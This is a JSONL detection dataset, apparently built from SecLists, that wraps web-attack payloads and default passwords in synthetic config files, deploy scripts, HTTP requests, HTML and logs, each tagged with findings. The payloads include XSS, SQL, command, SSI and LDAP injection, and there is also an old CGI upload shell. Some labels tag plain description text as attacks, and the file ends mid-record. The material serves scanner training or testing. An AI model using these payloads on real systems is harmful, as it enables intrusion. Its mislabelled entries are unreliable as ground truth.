"seclists_01927", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:truck@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "truck"}}]} {"id": "seclists_01928", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %26%20sleep%200%20%26%26%20str%3D%24%28echo%20IFMAPS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IFMAPS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27", "injection_type": "cmd"}}]} {"id": "seclists_01929", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %s%p%x%d", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%s%p%x%d", "injection_type": "cmd"}}]} {"id": "seclists_01930", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Datawizard.net,anonymous,any@,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Datawizard.net,anonymous,any@,"}}]} {"id": "seclists_01931", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0aecho%20EMMLEG$((69%2B45))$(echo%20EMMLEG)EMMLEG%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aecho%20EMMLEG$((69%2B45))$(echo%20EMMLEG)EMMLEG%26", "injection_type": "cmd"}}]} {"id": "seclists_01932", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:blue12@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "blue12"}}]} {"id": "seclists_01933", "source": "seclists", "source_license": "MIT", "text": "filename=&#x0003C;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x0003C;", "injection_type": "cmd"}}]} {"id": "seclists_01934", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);", "injection_type": "NoSQL"}}]} {"id": "seclists_01935", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><embed oncopy=\"alert(1)\" contenteditable>test</embed></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<embed oncopy=\"alert(1)\" contenteditable>test</embed>", "injection_type": "XSS"}}]} {"id": "seclists_01936", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<main onbeforepaste=\"alert(1)\" contenteditable>test</main>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<main onbeforepaste=\"alert(1)\" contenteditable>test</main>", "injection_type": "XSS"}}]} {"id": "seclists_01937", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>:target {color: red;}</style><table id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></table>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color: red;}</style><table id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></table>", "injection_type": "XSS"}}]} {"id": "seclists_01938", "source": "seclists", "source_license": "MIT", "text": "filename=<<", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<<", "injection_type": "cmd"}}]} {"id": "seclists_01939", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: This can be used when input is concatenated in JavaScript.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This can be used when input is concatenated in JavaScript.", "injection_type": "XSS"}}]} {"id": "seclists_01940", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Tags: general, concatenated, obfuscated HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, concatenated, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_01941", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Sitecore Corporation,Audrey,a,http://www.procheckup.com/media/176566/pentesting_sitecore.pdf@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Sitecore Corporation,Audrey,a,http://www.procheckup.com/media/176566/pentesting_sitecore.pdf"}}]} {"id": "seclists_01942", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_01943", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>aim: uri exploit</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "aim: uri exploit", "injection_type": "XSS"}}]} {"id": "seclists_01944", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><code onbeforecopy=\"alert(1)\" contenteditable>test</code></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<code onbeforecopy=\"alert(1)\" contenteditable>test</code>", "injection_type": "XSS"}}]} {"id": "seclists_01945", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf !@#$%%^#$%#$@#$%$$@#$%^^**(()", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "!@#$%%^#$%#$@#$%$$@#$%^^**(()", "injection_type": "cmd"}}]} {"id": "seclists_01946", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><xmp id=x tabindex=1 onbeforedeactivate=alert(1)></xmp><input autofocus></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<xmp id=x tabindex=1 onbeforedeactivate=alert(1)></xmp><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_01947", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: ha.ckers.org\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01948", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"http_cookie\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"http_cookie\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01949", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=3COM,3comcso,RIP000,Resets all passwords to defaults\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "3COM,3comcso,RIP000,Resets all passwords to defaults"}}]} {"id": "seclists_01950", "source": "seclists", "source_license": "MIT", "text": "filename=';shutdown--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "';shutdown--", "injection_type": "cmd"}}]} {"id": "seclists_01951", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=$null HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "$null", "injection_type": "cmd"}}]} {"id": "seclists_01952", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=IE VB Messagebox injection HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "IE VB Messagebox injection", "injection_type": "XSS"}}]} {"id": "seclists_01953", "source": "seclists", "source_license": "MIT", "text": "filename=%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27", "injection_type": "cmd"}}]} {"id": "seclists_01954", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><figcaption oncut=\"alert(1)\" contenteditable>test</figcaption></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<figcaption oncut=\"alert(1)\" contenteditable>test</figcaption>", "injection_type": "XSS"}}]} {"id": "seclists_01955", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>:target {transform: rotate(180deg);}</style><xss id=x style=\"transition:transform 10s\" ontransitioncancel=alert(1)></xss></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {transform: rotate(180deg);}</style><xss id=x style=\"transition:transform 10s\" ontransitioncancel=alert(1)></xss>", "injection_type": "XSS"}}]} {"id": "seclists_01956", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Fujitsu Siemens,manage,!manage,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Fujitsu Siemens,manage,!manage,"}}]} {"id": "seclists_01957", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<xml ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:alert('XSS')\"&gt;</B></I></xml><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<xml ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:alert('XSS')\"&gt;</B></I></xml><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>", "injection_type": "XXE"}}]} {"id": "seclists_01958", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27", "injection_type": "cmd"}}]} {"id": "seclists_01959", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=FALSE HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "FALSE", "injection_type": "cmd"}}]} {"id": "seclists_01960", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Xerox,<N/A>,0,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Xerox,<N/A>,0,"}}]} {"id": "seclists_01961", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><i id=x tabindex=1 onbeforeactivate=alert(1)></i></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<i id=x tabindex=1 onbeforeactivate=alert(1)></i>", "injection_type": "XSS"}}]} {"id": "seclists_01962", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:fussball", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "fussball"}}]} {"id": "seclists_01963", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+''; HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+'';", "injection_type": "XSS"}}]} {"id": "seclists_01964", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=t'exec master..xp_cmdshell 'nslookup www.googl ... HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "t'exec master..xp_cmdshell 'nslookup www.googl ...", "injection_type": "SQL"}}]} {"id": "seclists_01965", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=IMG w/VBscript HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "IMG w/VBscript", "injection_type": "XSS"}}]} {"id": "seclists_01966", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example \u201d<SCRIPT\\s\u201d != \u201d<SCRIPT/XSS\\s\u201d</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example \u201d<SCRIPT\\s\u201d != \u201d<SCRIPT/XSS\\s\u201d", "injection_type": "XSS"}}]} {"id": "seclists_01967", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\\n/usr/bin/id; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\n/usr/bin/id;", "injection_type": "cmd"}}]} {"id": "seclists_01968", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='&echo$IFSSFRDQJ$((5%2B47))$(echo$IFSSFRDQJ)SFRDQJ%5C%5C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'&echo$IFSSFRDQJ$((5%2B47))$(echo$IFSSFRDQJ)SFRDQJ%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01969", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = or sleep(__TIME__)='", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or sleep(__TIME__)='", "injection_type": "SQL"}}]} {"id": "seclists_01970", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf <![CDATA[<script>var n=0;while(true){n++;}</script>]]>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<![CDATA[<script>var n=0;while(true){n++;}</script>]]>", "injection_type": "cmd"}}]} {"id": "seclists_01971", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \\n/usr/bin/id|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\n/usr/bin/id|", "injection_type": "cmd"}}]} {"id": "seclists_01972", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 0=0 #\"';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 0=0 #\"", "injection_type": "SQL"}}]} {"id": "seclists_01973", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"server_admin\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"server_admin\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01974", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %3B%20str%3D%24%28echo%20TWCHKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20TWCHKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23", "injection_type": "cmd"}}]} {"id": "seclists_01975", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: //*", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "//*", "injection_type": "cmd"}}]} {"id": "seclists_01976", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>'>alert(1)</script><script/1='</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'>alert(1)</script><script/1='", "injection_type": "XSS"}}]} {"id": "seclists_01977", "source": "seclists", "source_license": "MIT", "text": "filename=%3B%20str%3D%24%28echo%20OXFDXC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20OXFDXC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_01978", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><dfn onmouseup=\"alert(1)\">test</dfn></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dfn onmouseup=\"alert(1)\">test</dfn>", "injection_type": "XSS"}}]} {"id": "seclists_01979", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"http_form\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"http_form\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01980", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<meter id=x tabindex=1 onfocusin=alert(1)></meter> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<meter id=x tabindex=1 onfocusin=alert(1)></meter>", "injection_type": "XSS"}}]} {"id": "seclists_01981", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=29 % HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "29 %", "injection_type": "SQL"}}]} {"id": "seclists_01982", "source": "seclists", "source_license": "MIT", "text": "username=1)) or sleep(__TIME__)#&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1)) or sleep(__TIME__)#", "injection_type": "SQL"}}]} {"id": "seclists_01983", "source": "seclists", "source_license": "MIT", "text": "password: Atlassian,Username,password,http://www.commandfive.com/papers/C5_TA_2013_3925_AtlassianCrowd.pdf\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Atlassian,Username,password,http://www.commandfive.com/papers/C5_TA_2013_3925_AtlassianCrowd.pdf"}}]} {"id": "seclists_01984", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<pre><!--#exec cmd=\"dir\" --></pre>\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<pre><!--#exec cmd=\"dir\" --></pre>", "injection_type": "SSI"}}]} {"id": "seclists_01985", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: TRUE", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "TRUE", "injection_type": "cmd"}}]} {"id": "seclists_01986", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><rp id=x tabindex=1 onfocusin=alert(1)></rp></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rp id=x tabindex=1 onfocusin=alert(1)></rp>", "injection_type": "XSS"}}]} {"id": "seclists_01987", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: Self-contained XSS variant 9\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Self-contained XSS variant 9", "injection_type": "XSS"}}]} {"id": "seclists_01988", "source": "seclists", "source_license": "MIT", "text": "# LDAP query log\nsearchFilter: %28", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%28", "injection_type": "LDAP"}}]} {"id": "seclists_01989", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=)) or pg_sleep(__TIME__)-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ")) or pg_sleep(__TIME__)--", "injection_type": "SQL"}}]} {"id": "seclists_01990", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><col onmouseleave=\"alert(1)\">test</col></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<col onmouseleave=\"alert(1)\">test</col>", "injection_type": "XSS"}}]} {"id": "seclists_01991", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><tr onbeforecopy=\"alert(1)\" contenteditable>test</tr></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<tr onbeforecopy=\"alert(1)\" contenteditable>test</tr>", "injection_type": "XSS"}}]} {"id": "seclists_01992", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><section onmousedown=\"alert(1)\">test</section></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<section onmousedown=\"alert(1)\">test</section>", "injection_type": "XSS"}}]} {"id": "seclists_01993", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=sonoma\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "sonoma"}}]} {"id": "seclists_01994", "source": "seclists", "source_license": "MIT", "text": "filename=' or userid like '%", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or userid like '%", "injection_type": "cmd"}}]} {"id": "seclists_01995", "source": "seclists", "source_license": "MIT", "text": "#!/bin/sh\n#\n# BETA1 - upload to /tmp/upload\n#\n# SH_KIT\n#\n# up.sh = File Upload\n#\n# by: The Dark Raver\n# modified: 16/12/2005\n#\n\necho Content-Type: text/html\necho\n\necho \"<html><body>\"\necho \"<form enctype=\\\"multipart/form-data\\\" action=\\\"\\\" method=\\\"post\\\">\"\necho \"<p>Local File: <input name=\\\"userfile\\\" type=\\\"file\\\">\"\necho \"<input type=\\\"submit\\\" value=\\\"Send\\\">\"\necho \"</form><br><br><br>\"\n\necho \"<hr>\"\n\ndd count=$CONTENT_LENGTH bs=1 of=/tmp/test\n\nlineas=`cat /tmp/test | wc -l`\n#echo LIN: $lineas\nlineas2=`expr $lineas - 4`\n#echo LIN2: $lineas2\nlineas3=`expr $lineas2 - 1`\n#echo LIN3: $lineas3\n\n#echo \"<hr>\"\n\ntail -$lineas2 /tmp/test > /tmp/test2\nhead -$lineas3 /tmp/test2 > /tmp/upload\n#rm /tmp/test\n#rm /tmp/test2\n\necho \"<pre>\"\ncat /tmp/upload\necho \"</pre>\"\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "sh", "filename": "up.sh"}}]} {"id": "seclists_01996", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = a' waitfor delay '0:0:10'--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a' waitfor delay '0:0:10'--", "injection_type": "SQL"}}]} {"id": "seclists_01997", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'admin' or '1'='1'#';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin' or '1'='1'#", "injection_type": "SQL"}}]} {"id": "seclists_01998", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=dandan\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "dandan"}}]} {"id": "seclists_01999", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=) HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ")", "injection_type": "LDAP"}}]} {"id": "seclists_02000", "source": "seclists", "source_license": "MIT", "text": "password: 2222222\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "2222222"}}]} {"id": "seclists_02001", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<main id=x tabindex=1 onfocus=alert(1)></main> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<main id=x tabindex=1 onfocus=alert(1)></main>", "injection_type": "XSS"}}]} {"id": "seclists_02002", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=hybrid\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "hybrid"}}]} {"id": "seclists_02003", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: Firefox uses Google's \u201dfeeling lucky\u201d function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's \u201dkeyword:\u201d protocol. You can concatenate several keywords by using something like the following \u201dkeyword:XSS+RSnake\u201d</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Firefox uses Google's \u201dfeeling lucky\u201d function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses 